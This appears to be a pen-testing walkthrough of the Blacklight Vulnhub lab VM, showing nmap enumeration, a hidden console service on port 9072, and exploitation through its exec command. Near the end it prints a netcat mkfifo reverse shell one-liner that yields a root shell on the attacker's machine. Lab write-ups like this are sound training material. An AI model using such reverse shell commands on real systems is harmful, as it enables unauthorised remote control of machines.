The Blacklight Vulnhub VM was a rather short and simple system to pen test but may have a few tricks to it as well as rabbit holes. There were a few flags but I just wanted to obtain root. As such, the flags will not be listed in this particular walkthrough.
The Blacklight Vulnhub VM download can be found here: https://www.vulnhub.com/entry/blacklight-1,242/
Date Released: 8 June 2018
Author: Carter B
Series: Blacklight
Here’s the basic description taken from Vulnhub:
Recommend that you use VirtualBox
1. Service Enumeration
Using the following nmap command: nmap -O -A -sT -sV -p- -T5 192.168.1.28 -vvv
We get the following output
root@kali:~# nmap -O -A -sT -sV -p- -T5 192.168.1.28 -vvvStarting Nmap 7.60 ( https://nmap.org ) at 2018-07-19 04:37 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:37
Completed NSE at 04:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:37
Completed NSE at 04:37, 0.00s elapsed
Initiating ARP Ping Scan at 04:37
Scanning 192.168.1.28 [1 port]
Completed ARP Ping Scan at 04:37, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 04:37
Completed Parallel DNS resolution of 1 host. at 04:37, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 04:37
Scanning 192.168.1.28 [65535 ports]
Discovered open port 80/tcp on 192.168.1.28
Discovered open port 9072/tcp on 192.168.1.28
Completed Connect Scan at 04:37, 3.03s elapsed (65535 total ports)
Initiating Service scan at 04:37
Scanning 2 services on 192.168.1.28
Completed Service scan at 04:39, 146.26s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.28
NSE: Script scanning 192.168.1.28.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:39
Completed NSE at 04:39, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:39
Completed NSE at 04:39, 1.01s elapsed
Nmap scan report for 192.168.1.28
Host is up, received arp-response (0.00026s latency).
Scanned at 2018-07-19 04:37:21 EDT for 152s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: BLACKLIGHT
9072/tcp open unknown syn-ack
| fingerprint-strings:
| DNSStatusRequest, DNSVersionBindReq, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
|_ BLACKLIGHT console mk1. Type .help for instructions
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9072-TCP:V=7.60%I=7%D=7/19%Time=5B504DCA%P=x86_64-pc-linux-gnu%r(NU
SF:LL,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instr
SF:uctions\n")%r(GenericLines,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x
SF:20\.help\x20for\x20instructions\n")%r(GetRequest,34,"BLACKLIGHT\x20cons
SF:ole\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(HTTPOptions
SF:,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruc
SF:tions\n")%r(RTSPRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\
SF:.help\x20for\x20instructions\n")%r(RPCCheck,34,"BLACKLIGHT\x20console\x
SF:20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(DNSVersionBindRe
SF:q,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instru
SF:ctions\n")%r(DNSStatusRequest,34,"BLACKLIGHT\x20console\x20mk1\.\x20Typ
SF:e\x20\.help\x20for\x20instructions\n")%r(Help,34,"BLACKLIGHT\x20console
SF:\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SSLSessionReq,
SF:34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instruct
SF:ions\n")%r(TLSSessionReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20
SF:\.help\x20for\x20instructions\n")%r(Kerberos,34,"BLACKLIGHT\x20console\
SF:x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SMBProgNeg,34,"
SF:BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions
SF:\n")%r(X11Probe,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x2
SF:0for\x20instructions\n")%r(FourOhFourRequest,34,"BLACKLIGHT\x20console\
SF:x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(LPDString,34,"B
SF:LACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\
SF:n")%r(LDAPSearchReq,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.hel
SF:p\x20for\x20instructions\n")%r(LDAPBindReq,34,"BLACKLIGHT\x20console\x2
SF:0mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(SIPOptions,34,"BL
SF:ACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n
SF:")%r(LANDesk-RC,34,"BLACKLIGHT\x20console\x20mk1\.\x20Type\x20\.help\x2
SF:0for\x20instructions\n")%r(TerminalServer,34,"BLACKLIGHT\x20console\x20
SF:mk1\.\x20Type\x20\.help\x20for\x20instructions\n")%r(NCP,34,"BLACKLIGHT
SF:\x20console\x20mk1\.\x20Type\x20\.help\x20for\x20instructions\n");
MAC Address: 08:00:27:73:DB:5C (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=7/19%OT=80%CT=1%CU=31518%PV=Y%DS=1%DC=D%G=N%M=080027%T
OS:M=5B504E59%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=I%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6
OS:=7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)Uptime guess: 30.141 days (since Tue Jun 19 01:16:24 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zerosTRACEROUTE
HOP RTT ADDRESS
1 0.26 ms 192.168.1.28NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 04:39
Completed NSE at 04:39, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 04:39
Completed NSE at 04:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.44 seconds
Raw packets sent: 23 (1.806KB) | Rcvd: 15 (1.278KB)
We see there are 2 services running. One being an Apache web service and another running on port 9072.
2. Web Enumeration
I ran a number of different web enumeration tools such as nikto, dirb, and dirbuster. There wasn’t anything interesting to look at other than the robots.txt which all three tools found. That being said, when using nikto against this Blacklight Vulnhub VM we get the following output:
Viewing the robots.txt file we get:
The flag1.txt file will contain the first flag. As previously stated at the beginning of this walkthrough I was not particularly concerned about capturing the flag info. However, in the flag1.txt file there was a hint towards the service running port 9072:
The tip here is the 9072. The secret is at home part isn’t very useful and it’s just misleading.
The blacklight.dict file is of course a dictionary file. This is probably used to obtain a flag elsewhere on the system or do something else.
3. Port 9072 Enumeration
I decided to start off using telnet to see if I can connect to the service and see what presented itself:
We have access to about 4 commands:
- help — displays the menu obviously
- readhash — this displays a SHA256 bit hash (b5f4723bd6df85b54b0905bd6d734be9ef1cc1eb977413a932a828b5c52ef5a6)
- exec — execute commands
- quit — and obviously quit
The hash that gets returned from readhash is probably used for something else on the system. We were not concerned with this part. However, I ran the hash against the dictionary file with John the Ripper using john — wordlist=/root/Desktop/blacklight.dict hash.txt — format=raw-sha256 and got nothing interesting back. Go figure!
This portion of the penetration test has a gotcha. If one executes exec twice, readhash twice, or both readhash & exec the server will lock you out completely. Once locked out the only way to get back in is reset the VM.
Whenever a system or application allows a user to input commands or execute commands, this should always be considered as one of the primary attack vectors. In this particular case it was the exact attack vector we were looking for.
There’s an additional gotcha with this exec command. It does not output anything you give it to run. It all happens in the background. This was tested using tcpdump to watch for any packets
tcpdump -i eth0 icmp
In the above screenshot, we can see the ping request I performed on the target using .exec `ping -c 1 192.168.1.29`
I do not recommend using ping as a test especially if you are unsure of how many attempts you would have before getting locked out. Since we have control over the VM though, we can simply reset it to get our 2 attempts back.
Using one of the common reverse shells found on numerous cheat sheet websites ( http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet ) we were able to create a reverse shell to our Kali box. I used the following command on the victim machine after starting a netcat listener on my Kali box:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.29 8080 >/tmp/fThis of course requires the system has netcat to work obviously. In our particular case it did have it.
On our Kali machine we receive the shell which was running as root:
